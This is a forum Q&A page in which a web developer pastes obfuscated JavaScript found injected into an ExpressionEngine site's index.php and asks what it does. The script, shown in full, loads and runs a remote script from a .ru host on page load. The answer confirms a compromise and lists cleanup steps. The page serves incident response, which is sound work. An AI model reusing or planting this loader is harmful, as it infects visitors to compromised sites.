Home/ Questions/Q 836669
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-15T05:01:15+00:00

I validated my client’s website to xHTML Strict 1.0/CSS 2.1 standards last week. Today

  • 0

I validated my client’s website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. Is this a hacking attempt as I suspected? I couldn’t help but notice the Russian domain encoded in the script…

What is this javascript doing? I need to explain the specific dangers to my client.




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
                Fp=VU[u](A);
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo');
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0];
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp);
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y;
    cU=["Yr","gv"];
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Yes. The site has been compromised.

    What you need to do is:

    1. Ensure that everyone who had access to those passwords run an updated virusscan on computers that they may have logged into the site from.
    2. Ensure that you change all login and admin passwords.
    3. If possible you should likely revert to the codebase as it was prior to you coming across this.
    4. Check the modification time of the script where you found this snippet (if it isn’t too late) and look for other files that have been changed around that time. The script is likely randomly generated so grepping for parts of it is unlikely to be conclusive.

    If this script was able to find its way in, then so can others. It is not uncommon that web sites are compromised via keylogging trojans on the computers of those who log into them.
    See http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

    • 0